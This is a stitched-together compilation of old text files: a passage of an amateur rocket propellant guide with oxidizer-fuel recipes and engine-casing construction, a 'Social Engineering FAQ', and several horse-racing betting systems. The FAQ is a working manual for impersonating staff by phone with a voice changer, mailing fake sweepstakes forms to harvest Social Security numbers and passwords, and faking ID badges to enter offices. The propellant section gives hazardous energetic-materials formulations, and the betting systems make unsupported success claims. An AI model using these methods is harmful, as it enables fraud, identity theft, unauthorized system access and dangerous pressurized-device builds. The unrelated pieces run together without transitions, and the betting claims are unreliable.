products of exhaust are N2, CO, CO2, H2, H2O, and HCl. The HCl may pose some
problem if the engine is used in high humidity as the HCl vapor may form
visible hydrochloric acid fumes.
Ammonium Nitrate NH4NO3. This oxidizer is useful as it is usually available
in bulk weight. The products of disassociation of NH4NO3 are 100% gas. How-
ever the temperatures produced by the propellant are low. For this reason,the
specific impulse of NH4NO3 propellants are usually no greater than 180 lb-sec
/lb and low percentage propellants have an Isp of 75 lb-sec/lb. The products
of exhaust of NH4NO3 propellants are N2, CO, CO2, H2, H2O. These gases cause
no special problems. The burning rate of NH4NO3 Propellants are low, ranging
from 0.05 in/sec to 0.27 in/sec. The higher burning rates are possible if
catalysts are used in the propellant. Prussian blue, chromium compounds
(ammonium dichromate), or cobalt compounds are catalysts that are used. 
Ammonium nitrate is hygroscopic and undergoes a phase change if the temper-
ature goes above 90 deg./F. Because of this phase change, some grains may
crack if the temperature cycles about this temperature. The burning temper-
ature of NH4NO3 propellants are lower than any other propellants especially
at low percentages of oxidizer.
Lithium Perchorate LiClO4. Some work has been done using lithium perchlorate
as an oxidizer. The lithium chloride formed in the exhaust is a gas at high
temperatures. Lithium salts are hygroscopic and must be protected from high
humidity. Burning rates of LiClO4 propellants are similar to KClO4 mixtures.

                                 4.) FUELS
                                 
Fuels Used in Composite Propellants : Since most rubbers and polymers are not
available to the general public, some adjustments have to be made. A good
source of plastics is an auto supply store. There you can find epoxy resin
which can be used as a fuel. You will also find fiberglass resin. This is a
liquid made from polystyrene and polyester resin. It is catalyzed with a few
drops of hardener. PVC plastic can be dissolved in tetrahydofuran to make 
a thick paste. This can be mixed with an oxidizer and allowed to dry for an 
extended time to form a propellant grain. Asphalt was used in some JATO units
about 30 years ago but it was found lacking when used at high temperatures.
Some fuels used in commercial engines are polyurethane rubber, polysulfide
rubber, and butadiene-acrylic acid. Non ferrous metals are added to propell-
ants to increase the temperature of combustion and consequently the Isp. The
metals most used are aluminum, magnesium, and copper. The metals are usually
added in amounts of 5% - 25%. In engines designed to breath water as an oxid-
izer, metal amounts to about 50% to 80% of the weight of the propellant. The
other components are usually ammonium perchlorate and a polymer.

Propellant Grain Geometry : If the grain is ignited from end on, like a
candle burns, the thrust will be steady or neutral. If the grain has a hole
in it extending end to end and the combustion takes place from the inside out
then the thrust will rise to a peak or be progressive. This is because the
surface area of the grain becomes greater as it burns whereas in a neutral
grain the surface area remains the same. A cruciform shaped grain produces a
large amount of thrust first then tapers off because the surface area becomes
smaller. If the grain is tubular and the combustion takes place from both the
inside out and the outside in, then the thrust will be neutral but fast
burning.
Wherever you wish the grain not to burn, it must be coated with a retardent.
Epoxy works well as a retardent as does Elmers white glue. At least two coats
of retardent should be used. An epoxy retardent can be used to retain a grain
in a rocket engine. When tubular grains are used, the igniter is usually put
towards the nose of the rocket and fires backwards towards the nozzle. This
insures the grain is ignited completely.
Inspect the propellant grain for any cracks or imperfections. A crack can 
cause the surface area of the propellant to increase astronomically. This can
cause an explosion because of the increased pressure.


                            5.) PROPELLANT MIXTURES

The ratios of oxidizers and fuels depends on the type of engine desired. The
amount of oxidizer can be as high as 90% as in some ammonium nitrate mixes to
as little as 20% ammonium perchlorate as in some water breathing engines.

A fast burning mixture: Potassium Perchlorate 20%
       Isp=200          Ammonium Perchlorate  55%
                        Epoxy Resin/Hardener  17%
                        Powdered Aluminum      8%
 This is very fast burning but the exhaust makes a fairly heavy smoke.
 
A slow burning propellant. Great for sustainer engines.
       Isp=165          Ammonium Nitrate     70%
                        Ammonium Perchlorate 10%
                        Polyester Resin      18%                        
                        Powdered Charcoal     2%
Not very powerful but useful. The charcoal helps keep the combustion steady.

A very powerful mixture: Ammonium Perchlorate 75%
      Isp=250            Powdered Aluminum    10%
                         PVC in THF           15%                        
All the ingredients should be dampened with THF (tetrahydrofuran) before
mixing. Do this in an area with very good ventilation and wear rubber gloves
to keep from contacting the THF with bare skin. This mixture is best used in
a perforated grain to help the solvent evaporate.

An ammonium nitrate based propellant: Ammonium Nitrate   70%
             Isp=160                  Powdered Aluminum   5% 
                                      Polyester Resin    18%
                                      Ammonium Bichromate 5%
                                      Powdered Charcoal   2%
A good mix when perchlorates are not available.

Do not under any circumstances use chlorates for rocket propellants. You will
not make a rocket, just a pipe bomb with fins.


                      6.) COMPOUNDING PROPELLANTS

One thing to keep in mind when making a propellant, the volume of fuel/binder
to volume of oxidizer and additives must not be too low. If it is then the
mixture will be too dry to mix well. It will also hurt the strength of the 
grain. You may have to cut down on the amount of oxidizer depending on the
fuel you are using.
For rockets weighing 1 pound and less the easiest way to make the propellant
is to obtain a suitable container for mixing and put in the bottom of it the
correct amount of fuel/binder. The other ingredients are added one at a time 
to the fuel and mixed in. One thing that really determines the success of a
propellant is the particle size of the oxidizer. It should be as finely
powdered as possible. Continue mixing the propellant until it is a homo-
geneous mixture. Now pour it or stuff it into the engine casing taking care
to eliminate all air bubbles. Any mandrels needed to form the grain to shape
shpould already be lubricated for release and in place. After waiting a suit-
able time for the binder to harden, remove the mandrels and place the engine
in a warm place to finish curing. Inspect the grain for any cracks or imper-
fections.
Some large propellant grains are constructed by cementing smaller grains to-
gether. Disks of propellant can be glued and stacked to form a long grain.
The disks can be drilled with a number of holes to make a progressive or
regressive burning grain. The holes are lined up when the disks are stacked.
If you construct a press with a number of guide rods to match the drilled
holes, so much the better. The cement can be a very thin layer of the polymer
used to make the grain. If you are using a PVC based grain, then dampen both
mating surfaces with THF and press them together for a minute before adding
the next disk.
You can also load a cardboard casing with the propellant. After the prope-
llant is cured, this cartridge is loaded into the engine.
When drilling these propellants or using any power tool for shaping them, use
the lowest speed while checking to make sure no heat is building up on the
cutting surface. If care is used, machining propellants is safe.

                            7.) ENGINE CONSTRUCTION

The typical engine is designed to operate at 1000 psi. The casing of the
engine should be able to withstand at least 3000 psi as a safety factor. A
low carbon seamless steel tube with 1/16" walls can withstand that sort of
pressure. If the tubing has a welded seam, test fire a few engines to see if
the tubes can take the pressure. One drawback to using steel as an engine
casing is if the engine explodes you have some very lethal shrapnel flying
around. If you use a high strength/high heat plastic you can eliminate some
of this danger. Epoxy can be used to wet down a mat of fiberglass then the
fiberglass is rolled around a large dowel to form a casing. The dowel has to
be coated with a lubricant to keep the epoxy from gluing the casing and 
dowel together. Or you can obtain a heavy cardboard tube with the correct ID
and coat it with epoxy then wrap epoxy/fiberglass around it. If the tubes are
constructed properly they can take quite a bit of pressure before splitting
apart.
An rocket engine is equipped with a nozzle to accelerate the exhaust out of
the rocket at a high velocity. A nozzle has a convergent section that does 
this. A divergent section of nozzle is used to lower the exhaust pressure
so the exhaust gases accelerate out of the engine at high speeds.
The nozzle of the engine can be machined out of metal or made of a fireproof
ceramic. If the nozzle and the casing are metal, they can be brazed together
before the engine is loaded. The nozzle can also be screwed into place by
using 4 - 6 screws going through the side of the casing into the nozzle. Care
must be used to see that the screws don't break through the inside of the
nozzle. On smaller rockets, you may be able to get away with plaster of paris
nozzles or for more powerful motors try pressing a mixture of 90% kaolin and
10% aluminum oxide into a nozzle shape in the casing. Dampen the mix with a
little water before pressing. You can make a nozzle die by turning 2 pieces
of hardwood into divergent/convergent sections. This die should be fitted 
with a dowel guide pin at the mating points to help keep the die straight.
A nozzle can be made from just a divervent section. This can be easily made
by drilling the required hole in a section of nozzle. Then by drilling out
the first hole with larger drills without completely breaking through, a
diverging nozzle is formed. Smooth out the ID of the nozzle after drilling 
the holes. This type of nozzle is pretty good on smaller engines with a 1" ID
or less. By using some ingenuity, you should have no problem in making a 
servicable nozzle. A rule of thumb to use for the ID of the nozzle is to use
a hole that has an area (repeat-area,not diameter) 1/3 the area of the ID of
the rocket engine casing.
Most propellants burn unsteadily at low pressures. Solid rocket engines are
equipped with a blast plug that allows the pressure to build up in the engine
before being blown out like a cork in a bottle. Sometimes the ignitor is
combined with the blast plug in a single unit. A stiff plastic disk makes for
a good plug. It should have a thickness of about 1/16".
The engine is sealed with a plug in the fore section. Depending on the con-
struction of the engine this plug may be made of wood, plastic, or metal. It
is held in place with either screws or epoxy. This plug must make the casing
gas tight. Remember most rockets develop 1000 PSI.
The ignitor is simply an electric match. It can be made with nichrome wire
or a small light bulb. The match is used to ignite a small charge of black
powder that in turn ignites the propellant. The ignitors leads should be 
shunted together to eliminate premature ignition. A fuse can be used instead
of electric ignition. If you go this route, be sure of the burning time of
the fuse and allow yourself enough time to retreat to safety after igniting
the fuse. I cannot recommend using a fuse because you cannot stop a fuse
from burning if someone walks into your launch area. With electric ignition,
everything is under your control until the time of launching.
 
                             8.) Engine Design

   It would be nice to be able to give you the complete info on designing
rocket engines. However, the required math would be a file about 300K in
length. Also this file is mainly about propellants. The other info is gravy.
 The best I can offer is to check out your local library for design
and engineering books. If you want to build a rocket to simply shoot off to
stroke your pyro perversions, build a small engine containing no more than
4 oz. of fuel. Use a paper casing to keep the danger down and chances are
very good that if your construction is sound you'll get the thrill of seeing
your rocket go out of sight. If you plan to hoist a payload into suborbital
projectory however, learn about thermodynamics, interior ballistics, and
propellant chemistry.
 I recommend trying to get the book Amateur Rocketry Handbook. This
book is out of print but it was put together by the Fort Sill Artillery 
School and contains a lot of valuable info.

                       9.) Testing and Firing

    You should construct a few engines exactly the same and test fire a 
number of them to find out what to expect when you finally do launch a rocket
. The engines can be buried nozzle end up in the ground and fired. Time the
burning of the engine to figure out the rate of combustion of the propellant.
Inspect the casing to see how it stood up. If everything seems okay you can
construct a static testing fixture to measure the thrust. Keep in mind that
even a small engine can put out a few hundred pounds thrust for a split 
second. When you do launch a rocket, keep people away from the launch site
and under cover. Check out the skies for airplanes or other traffic. Don't
launch rockets under conditions of low visibility or heavy winds.



                         *** Kilroy was here ***
THE COMPLETE SOCIAL ENGINEERING FAQ!
"There's a sucker born every minute." PT Barnum

"Don't touch me, sucka." Mr. T

By bernz (official sponsor of the 1996 Croatian Olympic Men's Synchronized Swimming Team)
with shoutouts to: The Genocide2600, Silicon Toad and your big fat mama.

DISCLAIMER!!!!! THIS INFORMATION IS HERE FOR THE SOLE PURPOSE OF
ENLIGHTENMENT! IF YOU USE IT AND GET CAUGHT, NO ONE IS TO BLAME BUT
YOUR OWN IDIOTIC ASS!!!

SECTION I: INTRO
1.1 What is social engineering?
1.2 Why is there a FAQ about it?
1.3 Who cares?
1.4 Basic intro and other shit.

SECTION II: PHONE SOCIAL ENGINEERING
2.1 Basics
2.2 Equipment
2.3 Phreak stuff
2.4 Technique

SECTION III: SNAIL MAIL
3.1 Is Snail Mail acutally usefull for something?
3.2 Equipment
3.3 Technique

SECTION IV: INTERNET
4.1 Isn't this just hacking?

SECTION V: LIVE, FROM NEW YORK...
5.1 In person?
5.2 Equipment
5.3 I'm wearing a suit, now what?

SECTION VI: PUTTING IT TOGETHER
A sample problem

1.1 What is social engineering?

     The hacker's jargon dictionary says this:

Social Engineering: n.  Term used among crackers and  samurai for cracking
techniques that rely on weaknesses in  wetware rather than software; the aim
is to trick people into revealing passwords or other information that
compromises a target  system's security.  Classic scams include phoning up a
mark who has  the required information and posing as a field service tech or a 
fellow employee with an urgent access problem. 

     This is true. Social engineering, from a narrow point of view, is
basically phone scams which pit your knowledge and wits against another human.
This technique is used for a lot of things, such as gaining passwords,
keycards and basic information on a system or organization.

1.2 Why is there a FAQ about it?

     Good question. I'm glad I asked. I made this for a few reasons. The
first being that Social Engineering is rarely discussed. People discuss
cracking and phreaking a lot, but the forum for social engineering ideas is
stagnant at best. Hopefully this will help generate more discussion. I also
find that social engineering specialists get little respect, this will show
ignorant hackers what we go through to get passwords. The last reason is
honestly for a bit of Neophyte training. Just another DOC for them to read so
I don't get bogged with email.

1.3 Who Cares?

     To Neophytes: You should, you little fuck. If you think the world of
computers and security opens up to you through a keyboard and your redbox then
you are so fucking dead wrong. Good. Go to your school, change your grades and
be a "badass" hacker. Hacking, like real life, exists in more than just your
system. You can't use proggies to solve everything. I don't mean to sound
upset, but jesus, have a bit of innovation and a sense of adventure.

     To Experienced Hackers: Just thought it would help a bit.

1.4 Basic intro and shit for this document.

     This FAQ will address phone techniques, mail techniques, internet
techniques and live techniques. I will discuss Equipment and will put some
scripts of actual conversations from social engineering. There are times I
might discuss things that cross the line into phreaking or traditional
hacking. Don't send me email and say that my terms aren't correct and
blahblahblah isn't social engineering. I use them for convenience and lack of
better methods of explanation (eg I might say "dumpster diving is a form of
social engineering") Don't get technical.

SECTION II: PHONES

2.1 Basics

     This is probably the most common social engineering technique. It's
quick, painless and the lazy person can do it. No movement, other than fingers
is necessary. Just call the person and there you go. Of course it gets more
complicated than that.

2.2 What Equipment is necessary for this?

     The most important peice of hardware is your wetware. You have to have a
damn quick mind. As far as physical Equipment goes, a phone is necessary. Do
not have call waiting as this will make you sound less believeable. There is
no real reason why this does but getting beeped in the middle of a scam just
throws off the rhythym. The phone should be good quality and try to avoid
cordless, unless you never get static on them. Some phones have these great
buttons that make office noise in the background. 
     Caller ID units are helpful if you pull off a scam using callback. You
don't want to be expecting your girlfriend and pick up the phone and say, "I
wanna fuck you" only to find out it was an IBM operator confirming your
identity. Operators don't want to have sex with you and so your scam is
fucked. Besides, call ID units are just cool because you can say, "Hello,
<blank>" when someone calls. The Radio Slut carries these pretty cheap.
     Something I use is a voice changer. It makes my voice sound deeper than
James Earl Jones or as high as a woman. This is great if you can't change your
pitch very well and you don't want to sound like a kid (rarely helpful). Being
able to change gender can also be very helpful (see technique below). I got
one for a gift from Sharper Image. This means that brand will cost quite a bit
of cash, but it's very good quality. If anyone knows of other brand of voice changers, please inform me.


2.3 Phreaking and Social engineering? 

     Social Engineering and phreaking cross lines quite a lot. The most
obvious reasons are because phreaks need to access Ma Bell in other ways but
computers. They use con games to draw info out of operators.
     Redboxing, greenboxing and other phreaking techniques can be used to
avoid the phone bills that come with spending WAAAAYYY too much time on the
phone trying to scam a password. Through the internet, telnetting to
california is free. Through ma bell, it's pricey. I say making phone calls
from payphones is fine, but beware of background noise. Sounding like you're
at a payphone can make you sound pretty unprofessional. Find a secluded phone
booth to use.

2.4 How do I pull off a social engineering with a phone?

     First thing is find your mark. Let's say you want to hit your school.
Call the acedemic computer center (or its equivelent). Assuming you already
have an account, tell them you can't access your account. At this point they
might do one of two things. If they are stupid, which you hope they are, they
will give you a new password. Under that precept, they'll do that for most
people. Simply finger someone's account, specifically a faculty member. At
this point, use your voice changer when you call and imitate that teacher the
best you can. People sound different over the phone, so you'll have a bit of
help. 
     Try to make the person you're imitating a female (unless you are a female). Most of the
guys running these things will give anything to a good sounding woman because the majority of
the guys running minicomputers are social messes. Act like a woman (using voice changer) and
you'll have anything you want from them. 
     Most of the time the people working an area will ask for some sort of
verification for your identity, often a social security number. You should
find out as much information about a mark as you can (see mail and live
techniques) before you even think about getting on the phone. If you say you
are someone you aren't and then they ask you for verification you don't have,
they will be suspicious and it will be infinitely more difficult to take that
system.
     Once again for idiots: DO NOT TRY TO SOCIAL ENGINEER WITHOUT SUFFICIENT
INFORMATION ON YOUR MARK!
     Once people believe you are someone, get as much as you can about the
system. Ask for your password, ask for telnet numbers, etc. Do not ask for too
much as it will draw suspicion. 
     You must sound like a legitimate person. Watch your mark. Learn to speak
like him/her. Does that person use contractions? Does that person say "like" a
lot? Accent? Lisp? 
     The best way for observation of speech is to call the person as a
telemarketer or telephone sweepstakes person. Even if they just tell you they
can't talk to you, you can learn a quite a bit from the way they speak. If
they actually want to speak to you, you can use that oppurtunity to glean
information on them. Tell them they won something and you need their address
and social security number and other basic info. 

WARNING: ABUSING SOMEONE'S SOCIAL SECURITY NUMBER IS ILLEAGAL!!!
DON'T SAY YOU WEREN'T WARNED!!!

SECTION III: SNAIL MAIL

3.1 Is snail mail really useful?

     Yes. It actually is. Snail mail is not tapped. Snail mail is cheap. Snail mail is readily available.
But how can you use it in social engineering. As I said above, it's difficult to find systems that just
let you call with no verification. They do exist but they are rare. So therefore you need info on
your mark and the mark's system. You can try the telemarketing scam, but that isn't always
succesful, as people do not trust telemarketers. For some reason, though, people trust the written
word. Morons. People will respond to sweepstakes forms with enthusiasm and will give you
whatever info you want on it. That's why snail mail is so great.

3.2 What do I need?

     Obviously you need mail "equpiment" which includes stamps and envelopes. But subtle
things are required as well. You're going to want to have return address stickers that include
"your company's" logo and name. This can be procured at places like Staples, Office Max and
other stores for a realitively cheap price.
     The most important part to mail social engineering is a layout program. WordPerfect is
okay, but I prefer QuarkXpress or PageMaker. These programs are not cheap, but can be used for
plenty of other applications and are well worth their price. IF YOU GET IT PIRATED, I DON'T
ADVOCATE THAT ACTION. With these DTP programs, you can emmulate a tottaly
professional document. More about this below.
     A private mailbox is good. If you want to be very professional, get a PO box. I'm in a
band, so I use that PO box. They can be rented at a variety of places, including Post Offices and
MailBoxes, etc. for low fees. Share the cost with others for great cost effectiveness.

3.3 I've got the stuff, now what?

     What is your mark? Generally, for a mail social engineer, your mark is going to be a large
group of people. Thus, your mail should look like a mass mail sweepstakes. Use computer labels
and the like to keep this illusion. You need a list of employees from that company and their
addresses. 
     Look at the junk mail in your mail. Sweepstakes forms, mail-in orders, etc. Try tofake 
that look. Something with very few lines to fill in (but with your vital info on them). A watermark
is always a good touch for these documents. Use the fonts a business would use and word your
letters in a similar fashion. Illusion is everything. The information on these should include social
security numbers. Another good idea is to say that you'll need a password to verify the prize with
a voice call. Hopefully it'll be the same as their net account password. It usually is. Yes, people
actually fall for this stuff. 
     To make someone fill these out, they must be concise and visually appealling. A person
filling these out cannot be hasseled with difficult choices. Check Boxes are also a nice effect.
These must look believeable. Credibility is everything with social engineering. I cannot stress that
enough. I will soon realease examples, although you should be original and make some on your
own.
     Now, after stamping and addressing your letters, send them out and wait. Soon you
should receive some answers. At this point, use a standard phone social engineering. Social
Security numbers are the most common verification. If you find that you need some other form,
send out letters with that information. For example, sometimes mother's maiden name is used.

SECTION IV: INTERNET

4.1 Isn't this just a form of hacking?
     
     I guess it is to a point. Hacking takes more advantage of holes in security while the social
engineering takes advantage of holes in people's common sense. Finding your marks through a
hole in the fingering system is a great way to start an engineer. Many fingers give full names last
logins, login locations and all sorts of info. Find someone who hasn't been on in quite sometime. 
     There are also the classic schemes. Pretending to be a sysop in an IRC or online chat room
can make people give up passwords with ease.
     Yes, generally actions taken in the Internet or online are considered traditional hacking,
but your knowledge of the average human's wetware comes into play.

SECTION V: LIVE, FROM NEW YORK...

5.1 In person?

     Yup. This is pretty damn important. You can do quite a bit over a phone or through mail,
but sometimes you just have to get off your ass and do things yourself. Getting a password
digging through a desk is good, so is touring an office and just looking around. Even conning
your way into a terminal works. 

5.2 Equipment

     This is the only time in hacker culture where looks matter a great deal. Don't expect to
walk into VIACOM's offices wearing your Misfits T-shirt with lotsa zits and your walkman
makes you look suspicious. Look dignified. Wear a suit. Comb your hair. Don't get out of hand.
Be polite. If you want to look like you belong in that office, you should act that way, too. So you
need a suit. If you weigh more than 200 lbs (and are under 6' 2") or look like you're 20 or
younger, don't try this. You'll look dumb, be laughed at and possibly have security called on you.
You can look like an office worker's kid if you're that young. If you can do this, go ahead. Most
of us can't.
     Fake ID security cards (the kind that aligator clip to a belt or something) can be made with
a photo, a layout program and a lamination sheet. This just makes you look more official.
Sometimes one of this stick on visitor patches can be helpful. They make you look like your
unnatural observation is warrented by your visiting status.

5.3 I'm sweating in this suit..now what?

     Walk into an office building with confidence. Flash your badge or just have your visitor
tag. Pretend you really belong there. That's how you look. An office with cubicles is great. Just
walk around and peer at people's belongings. Find the company's UNIX minicomputer. They
tend to keep them behind a big plate glass window, so you can check out how its connected. This
is good scouting without having to sift through dumpsters or watching through binoculars. DO
NOT TRY TO HACK WHILE IN THE BUILDING!  IT'S PRETTY SUSPICIOUS LOOKING!

SECTION VI: PUTTING IT TOGETHER
     
     You want to see what your school's minutes are or you want to hack a local chemical
company to see their new toxins, but even if you had access it would be problematic to access the
passwords because they are running a VAX. Now what?
     First you get a list of employees. For schools, just use the catalog. For companies, use a
live engineering technique. Look for payroll sheets, or posted employee lists. If you look right,
you can just ask a low level employee for a list. Remember, be calm in front of people. You have
to maintain your credibility.
     Finger each employee's account. Find out who has or hasn't used their account in the past
few months. Those who haven't are your marks. Write those names down cause your gonna play
them for all they are worth, goddammit.
     Now we go to the phone book and get the employees addresses. Then we create a
document in our DTP program that emmulates a short sweepstakes form or another short
document commonly encountered in the field. It must look professional but subtle enough not to
look false. Credibility once again. Remember to include the social security number space as well
as other information. Send these out and wait or masturbate or whatever you do for a few days.
Yes, you're going to have to spend $10 on stamps unless you are on good terms with who you
engineered in person. If they trust you, go back and use the stamping machine..might as well.
     Now get your phone and call their sysadm. Use women voices first because the guys that
run these machines have rarely seen daylight, let alone women. They are EASILY manipulated
with a woman's voice. Sound helpless, they love it. If they don't give you your password, you'll
have plenty of info for them for verification. If you pretend to be a woman, they'll give youplenty
of leway. Go as far as saying you've seen them at work and think they are cute. Watch the
passwords fly. 
     
  
THE ASSOCIATION METHOD
Form Races refer to all the past races given in detail by the Racing Post.
Placed refers to 1st, 2nd or 3rd NOT 4th or anything lower.
You can use level stakes or a staking plan.
Only consider races run in Great Britain.
Do not consider the courses Lingfield and Southwell.
Do not consider any meetings held on all weather courses.
Consider most races except selling races, conditional, amateur or those with lady jockeys.
Out of the remaining races consider those with between four and sixteen runners.
Don't consider races where less than half or only half of the runners have a topspeed rating.
Narrow down the runners in the selected races by picking the horses which coincide with being in the topspeed's top 2-4 and topspeed's last time out top 2-4. This varies from race to race depending on the number.
For a race with 4-6 runners the horse must be in the top 2.
For a race with 7-11 runners in the top 3.
For a race with 12-16 runners in the top 4.
So for an eight horse race for example, we are interested in the top three of each rating.
HORSE & RATING FROM LAST RUN  MASTER RATING 
A(86)  104 
B(95)  101 
C(51)  94 
D(41)  94 
E(91)  91 
F(40)  84 
G(72)  72 
H(39)  52 

Here the top three are horses A,B and C. The last time out the top three (the figures in brackets) were B, E and A. The two coinciding horses A and B qualify for further consideration, the rest are neglected.
The horses must have been placed in at least half of their races this season. If they haven't run this season then you can rule them out.
The trainer must be one of the top 20 trainers (in the most recent list given in the Racing Post). If on a day a list greater than 20 is given then the trainers who produce more than 30% winners qualify also (but only on the day they appear in the table).
In the form races the horses must have been placed in a race of greater or within 25% of the value of todays race (this is achieved by multiplying the value of todays race by 0.75 or three quarters and then comparing.
These are the rules specific to National Hunt Racing:-
Rule out the following:-
Horses which haven't run within 35 days
Horses aged 12 or over
Horses which are odds on in the betting forecast
Ignore horses carrying 11-7 and above. Only consider horses carrying 11-3 and above if they have been placed carrying within 2lbs of todays weight.
A horse must be able to handle the distance therefore it must be either a distance winner (indicated by a (D)), or placed 4 lengths behind in a race within 1 furlong of todays distance or won a race within 2 furlongs. (Remember there are 8 furlongs in a mile).
If more than one horse remains then rule out the race. If 1 horse remains then that is the selection.
These are the specific rules for Flat Racing:-
Rule out the following:-
Horses that haven't run within 28 days.
Horses aged 8 or over.
Horses which are odds in the betting forecast.
Ignore horses carrying 9-7 and above. Only consider horses carrying 9-3 and above if they have been placed carrying within 2 lbs of todays weight.
A horse must be able to handle the distance therefore it must be either a distance winner (indicated by a (D) ) or placed 2 lengths behind in a race within ½ furlong of todays distance or won a race within 1 furlong.
If more than 1 horse remains then rule out the race. If 1 horse remains then that is your selection.
--------------------------------------------------------------------------------
A Beginner's Selection Method 
     Although  called  a  "beginner's system",  this  method  can 
be  used  by  anyone  wanting  a  relatively  quick,   mechanical 
selection process.  It will usually point toward the best  horses 
in  the race, with the winner to be found somewhere in the  final 
three  picks  most of the time.  On May 10th,  1989  Golden  Gate 
Fields, it picked 6 of 9 winners! 

     So  you've  never  been to  the  racetrack,  know  virtually 
nothing  about  horseracing, but would still like to  amaze  your 
friends  with you handicapping prowess?  Do we have a method  for 
you! 

     The  first step, of course, is to purchase the Daily  Racing 
Form.    Next  turn  to  the  section  that  contains  the   past 
performances of the horses running today at the track you plan to 
attend.  That's the hard part! 

     Frankly,  I'd like to reprint a couple of past  performances 
here,  but  alas I do not have the permission  of  the  copyright 
holder!  Even so, it should be simple to figure out exactly  what 
I'm talking about. 

     This  method is very simple and mechanical.  You won't  have 
to worry about whether or not you've selected the "right" horse - 
everything is automatic. 

The Horse Cents Quick Method 

     For each horse in the race, total the speed rating and track 
variant for it's last two races.  These figures are found in  the 
main  body of the past performances.  There's a speed rating  and 
track  variant for just about every race line on each horse.   It 
looks  something like this 77-14.  The first number is the  speed 
rating  for the race (how fast a horse ran compared to the  track 
record  for  that distance) and the second number  is  the  track 
variant  (an  indication of how fast or slow the track  was  that 
day).   Sometimes  a race did not get a rating at all.   In  that 
case,  ignore  it and simply take the  first  two  rating-variant 
combinations you find.  Start at the top of the past performances 
as these are the most recent races. 

     If  you're  having  trouble finding the  speed  ratings  and 
variants,  ask someone who looks like he knows what  he's  doing. 
Ask  a different person the same question just in case the  first 
person was jiving you! 

     Go  through  each  horse totaling those  speed  ratings  and 
variants.  Write the total number somewhere near the horse's past 
performances  and  circle it so you can't miss it.  This  is  the 
SPEED  FIGURE  for  that horse.  After  you've  totaled  all  the 
horses,  put  a big black "bullet" (solid black  circle  or  some 
other distinguishing mark) next to the  horse  with  the  highest 
figure. If more than  one horse has  the same  high speed figure, 
give them each a bullet. 

     Now it's time for step 2!  Find the lifetime earnings  line. 
This  is found just above the latest running line for the  latest 
race.  It looks something like this: 

     Lifetime  42 9 8 6 $157,150 

     What all of that means is that the horse ran 42 times in his 
life, won 9 times, ran second 8 times, ran third 6 times and made 
a grand total of over a hundred and fifty thousand dollars!   All 
you really care about is how many times he ran (42) and how  much 
money  he  made ($157,150).  Divide the money by  the  number  of 
starts  into  the  amount of money and round it  to  the  nearest 
dollar  (157150  / 42 = 3742).  Write the result  down  near  the 
horse's  name and circle it.  This is the CLASS FIGURE  for  that 
horse.   Find the horse with the highest class figure and  put  a 
bullet  by  his name.  If more than one horse has the  same  high 
class, give them each a bullet. 

     The third step is even easier than the first two.   However, 
it's  a  little confusing to do at first.  Looking for  a  winner 
really involves looking for losers and eliminating them.   You're 
going  to start eliminating horses that don't figure to  win  the 
race. 

     You're going to eliminate the lowest CLASS FIGURES and SPEED 
FIGURES alternately, starting with class.  Find the lowest  class 
figure and eliminate that horse from contention - draw a squiggly 
line  through his past performances and forget about  him.   Next 
find the lowest remaining speed figure and eliminate that  horse. 
Continue eliminating horses alternating from class to speed until 
you  have  only three (3) horses remaining.   Remember  to  start 
eliminating with CLASS (because C comes before S, you see!). 

     Once  you have only THREE horses remaining, look to  see  if 
any  of  those three horses had a "bullet work-out" at  the  same 
track  they're running on today AFTER his last race.  This  is  a 
bit  confusing,  but a bullet work-out is really  easy  to  spot. 
Look  at the bottom of the horse's past performances  and  you'll 
see up to four workouts that look something like this: 

     Apr 20 GG 4f ft :49 H 

     That's  a  work-out, but it's not a bullet work.   A  bullet 
work-out would have a black circle in front of it like this: 

     @ May 3 GG 3f ft :34 H    (pretend the @ is a bullet!) 

     A  bullet  work is the fastest recorded  work-out  for  that 
distance  of all horses working that day.  It's a good  indicator 
that  a  horse is ready to run today, especially if  it  occurred 
after  the horse's last race.  (The date of the last race is  the 
first information on the first past performance line, 17Apr89-5GG 
for example.) 

     If  any  of your three horses have a bullet  work-out  after 
their  last race, give them one of your "bullets" next  to  their 
name. 

     At  this  point,  your  three horses may  or  may  not  have 
bullets.   If only one of them has one or more of  your  bullets, 
that's  your pick.  If two or all three have the same  amount  of 
bullets, you're going to have to do a little more work.  Most  of 
the time, one horse will have the only bullet or (even better) it 
will  have two or three.  The more bullets the better the  chance 
of it winning. 

     If you still have a tie, pick the horse who came closest  to 
winning  his last race.  Find the final "beaten lengths"  in  his 
last  race - this is the small, superscripted number that  occurs 
just  before the jockey's name in the last past performance  line 
(in the Western Edition, anyway.).  You'll see four numbers  with 
superscripted  numbers  right about in the middle of the  line  - 
it's  the  last  superscript.  The big numbers  are  the  running 
positions  at various points in the race.  The  superscripts  are 
the  number  of  lengths behind the leader.   The  last  pair  of 
numbers  is the final placing and the number of  beaten  lengths. 
Pick  the horse with the smallest subscripted number if  the  big 
number  is  2 or more, if the big number is a 1, he did  win  his 
last race. 

     In the highly unlikely event you still haven't come up  with 
a pick, pick the horse with the highest class figure. 

     With a little practice and a calculator, you should have  no 
problem  doing a race in five minutes or less.  The hardest  part 
is  dividing  for the class figure - just takes a  bit  of  time. 
You'll  be  able  to do the entire day's races in  less  than  an 
hour's time and you'll find your picks are as good or better than 
anyone else's! 

    *** Late (1992) Update *** 
    Since the Daily Racing Form(c) now publishes the Andrew Beyer 
speed figures for _most_ races, you may substitute these for 
the Speed Rating - Variant pairs. 
  
  
THE DREAM RACING SYSTEM
 
While gaming at casinos is always -- ultimately -- a function of luck, the Sport of Kings is elevated far above games of mere chance. Regardless of the elegance of the roulette wheel or the intensity of the blackjack table, neither came approach racing for its subtlety, complexity, and beauty. The terms of casino games are always set. The odds might just as well be written in stone. Not so with this great sport. Flesh and blood come into play. The interplay of horse and rider. The conditions of the track. The field. Timing. 

In order to bet successfully in this great sport, you must bring to bear your skill and judgment. In no other betting environment do you have so much control over your fate. 

Your greatest advantage over the bookmakers is one of choice. Whereas you can choose your races -- and bets -- the bookmaker is obligated to participate in virtually every race conducted for 52 weeks a year. You can avoid a bet in a race that is not to your advantage. The bookmaker enjoys no such freedom. 

Yes, choice is your greatest ally. Yet for too many, it is their greatest enemy as well. Without mincing words, the simple truth is that the average bettor frequently makes the wrong choice. In doing so, he concedes the edge he has over the bookmaker and virtually guarantees that he will remain a loser over time. 

Common wisdom dictates that you should familiarize yourself with the individual characteristics of the horses, the field, the track and the form book. Needless to say, such an endeavor demands a huge commitment -- in time and effort. Indeed, it is virtually a full-time job. Those who master this knowledge will always be best placed to beat the book. They deserve the profits they earn. 

